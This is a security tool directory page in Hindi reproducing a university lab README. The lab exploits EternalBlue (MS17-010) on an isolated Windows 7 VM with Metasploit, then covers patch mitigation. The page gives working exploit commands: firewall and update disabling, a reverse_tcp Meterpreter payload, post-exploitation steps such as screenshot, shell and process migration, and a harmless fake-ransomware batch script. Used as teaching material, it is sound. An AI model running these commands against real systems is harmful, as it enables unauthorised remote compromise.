Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EternalBlue-Exploit-Demonstration — शैक्षिक प्रयोगशाला जो विंडोज 7 के विरुद्ध EternalBlue (MS17-010) शोषण का प्रदर्शन करती है, जिसमें Metasploit का उपयोग करते हुए पोस्ट-एक्सप्लॉइटेशन, WannaCry ransomware सिमुलेशन, और पृथक वातावरण में पैच मिटिगेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणपोस्ट-शोषणमालवेयर विश्लेषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
रेड टीमिंग
लैब और अभ्यास
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

शैक्षिक प्रयोगशाला जो विंडोज 7 के विरुद्ध EternalBlue (MS17-010) शोषण का प्रदर्शन करती है, जिसमें Metasploit का उपयोग करते हुए पोस्ट-एक्सप्लॉइटेशन, WannaCry ransomware सिमुलेशन, और पृथक वातावरण में पैच मिटिगेशन शामिल है।

रिपॉजिटरी देखें
54 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EternalBlue एक्सप्लॉइट प्रदर्शन (MS17-010)

साइबर सुरक्षा लैब जो CVE-2017-0144 (EternalBlue) का उपयोग करके Metasploit के माध्यम से एक असुरक्षित Windows 7 सिस्टम का शोषण करती है, और Meterpreter के ज़रिए SYSTEM-स्तर की पहुँच प्राप्त करती है।

यह परियोजना WannaCry-शैली के रैनसमवेयर हमले (सुरक्षित डेमो) का अनुकरण भी करती है और MS17-010 सुरक्षा पैच का उपयोग करके शमन प्रदर्शित करती है।


मॉड्यूल जानकारी

मॉड्यूल: CSCM828 सुरक्षा कमजोरियाँ और पेनिट्रेशन टेस्टिंग

छात्र:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

विश्वविद्यालय: Swansea University


संसाधन और डाउनलोड

  1. MS17-010 EternalBlue SMB रिमोट विंडोज कर्नेल पूल करप्शन
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 सुरक्षा अपडेट)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (वर्चुअल मशीन डाउनलोड)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  • VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


  • 1. अवलोकन

    यह लैब प्रदर्शित करता है:

    • SMB कमजोरी (MS17-010) का रिमोट एक्सप्लॉइटेशन
    • EternalBlue के माध्यम से कर्नेल-स्तर की पहुँच
    • Meterpreter सत्र स्थापना
    • पोस्ट-एक्सप्लॉइटेशन तकनीकें
    • WannaCry-शैली ransomware सिमुलेशन (सुरक्षित)
    • पैचिंग के माध्यम से शमन

    2. लैब वातावरण

    आवश्यकताएँ

    • VMware Workstation / VirtualBox
    • न्यूनतम 8GB RAM

    हमलावर मशीन

    • Kali Linux
    • Metasploit फ्रेमवर्क

    पीड़ित मशीन

    • Windows 7 SP1 x64 (अनपैच्ड)

    नेटवर्क

    • होस्ट-ओनली / NAT (पृथक वातावरण)
    • सुनिश्चित करें कि दोनों मशीनें संवाद कर सकें

    ⚠️ यह लैब पूरी तरह से पृथक वातावरण में संचालित की जानी चाहिए।


    3. पीड़ित सेटअप (Windows 7)

    एडमिनिस्ट्रेटर कमांड प्रॉम्प्ट में चलाएँ:

    फायरवॉल अक्षम करें

    root@kitploit:~
    netsh advfirewall set allprofiles state off
    

    SMB पोर्ट सत्यापित करें

    root@kitploit:~
    netstat -an | findstr :445
    

    अपडेट अक्षम करें (लैब स्थिरता के लिए)

    root@kitploit:~
    sc stop wuauserv
    sc config wuauserv start= disabled
    

    4. हमलावर सेटअप (Kali Linux)

    कनेक्टिविटी सत्यापित करें

    root@kitploit:~
    ping <victim-ip>
    nmap -p 445 <victim-ip>
    

    5. एक्सप्लॉइटेशन चरण

    चरण 1: लक्ष्य स्कैन करें

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    अपेक्षित:

    • होस्ट असुरक्षित है

    चरण 2: एक्सप्लॉइट चलाएँ

    root@kitploit:~
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS <victim-ip>
    set LHOST <attacker-ip>
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    run
    

    चरण 3: पहुँच की पुष्टि करें

    root@kitploit:~
    meterpreter > getuid
    

    अपेक्षित:

    root@kitploit:~
    NT AUTHORITY\SYSTEM
    

    6. पोस्ट-एक्सप्लॉइटेशन

    root@kitploit:~
    sysinfo
    getuid
    ps
    screenshot
    shell
    whoami
    ipconfig
    

    स्थिर माइग्रेशन

    root@kitploit:~
    ps
    migrate <explorer.exe PID>
    

    7. WannaCry सिमुलेशन (सुरक्षित डेमो)

    पेलोड बनाएँ (Kali)

    root@kitploit:~
    cat > /tmp/wannacry64.bat << 'EOF'
    @echo off
    title WannaCryptor Demo - SAFE SIMULATION
    color 0a
    mode con: cols=80 lines=25
    cls
    
    setlocal enabledelayedexpansion
    
    set id=%random%-%random%-%random%
    set /a timeleft=60
    
    :main
    cls
    echo ========================================================
    echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
    echo ========================================================
    echo.
    echo  All files have been encrypted!
    echo.
    echo  Send 0.25 BTC to:
    echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
    echo.
    echo  Personal ID: %id%
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    echo Initializing encryption...
    timeout /t 2 >nul
    
    for /l %%i in (1,1,20) do (
        set /a percent=%%i*5
        call :progress !percent!
        timeout /t 1 >nul
    )
    
    goto countdown
    
    :progress
    set bar=
    set /a blocks=%1/5
    for /l %%b in (1,1,!blocks!) do set bar=!bar!#
    cls
    echo ========================================================
    echo           ENCRYPTING FILES...
    echo ========================================================
    echo.
    echo Progress: [%bar%] %1%%
    echo.
    
    set /a randfile=%random% %% 5
    if !randfile!==0 echo Encrypting: documents.docx
    if !randfile!==1 echo Encrypting: photos.jpg
    if !randfile!==2 echo Encrypting: database.sql
    if !randfile!==3 echo Encrypting: backup.zip
    if !randfile!==4 echo Encrypting: project.pptx
    
    exit /b
    
    :countdown
    cls
    
    :loop
    cls
    echo ========================================================
    echo           YOUR FILES ARE ENCRYPTED
    echo ========================================================
    echo.
    echo  Pay within the time limit or files will be lost!
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    if !timeleft! LEQ 0 goto end
    
    set /a timeleft-=1
    timeout /t 1 >nul
    goto loop
    
    :end
    cls
    echo ========================================================
    echo              TIME EXPIRED
    echo ========================================================
    echo.
    echo  Your files are permanently locked.
    echo.
    echo  (This was a SAFE DEMO simulation)
    echo.
    echo ========================================================
    pause
    EOF
    

    अपलोड और निष्पादित करें

    root@kitploit:~
    meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
    meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
    

    8. शमन (पैच प्रदर्शन)

    चरण 1: पैच डाउनलोड करें

    • यहाँ जाएँ: https://www.catalog.update.microsoft.com/
    • खोजें: KB4012212 Windows 7 x64
    • .msu फ़ाइल डाउनलोड करें

    चरण 2: पैच स्थापित करें

    root@kitploit:~
    wusa.exe KB4012212-x64.msu /quiet /norestart
    

    चरण 3: पुनरारंभ करें

    root@kitploit:~
    shutdown /r /t 0
    

    चरण 4: पैच सत्यापित करें

    root@kitploit:~
    systeminfo | findstr KB4012212
    

    चरण 5: एक्सप्लॉइट पुनः चलाएँ

    अपेक्षित:

    • एक्सप्लॉइट विफल होता है
    • कोई Meterpreter सत्र नहीं

    चरण 6: Nmap से सत्यापित करें

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    अपेक्षित:

    • असुरक्षित नहीं

    9. समस्या निवारण

    समस्यासमाधान
    एक्सप्लॉइट विफल होता हैकनेक्टिविटी जाँचें
    कोई सत्र नहींफायरवॉल अक्षम करें
    सत्र समाप्त हो जाता हैएक्सप्लॉइट पुनः प्रयास करें
    कोई दृश्य विंडो नहींexplorer.exe पर माइग्रेट करें

    10. नैतिक विचार

    यह परियोजना संचालित की गई है:

    • केवल नियंत्रित लैब मशीनों पर
    • पूरी तरह से पृथक नेटवर्क में
    • केवल शैक्षिक उद्देश्यों के लिए

    अनधिकृत उपयोग उल्लंघन करता है:

    • यूके कंप्यूटर मिसयूज़ अधिनियम 1990

    11. निष्कर्ष

    यह लैब प्रदर्शित करता है:

    • EternalBlue का उपयोग कर वास्तविक दुनिया का SMB एक्सप्लॉइटेशन
    • Windows 7 का SYSTEM-स्तर से समझौता
    • Ransomware हमला सिमुलेशन (सुरक्षित)
    • समय पर पैचिंग का महत्व
    टूल डाउनलोड करें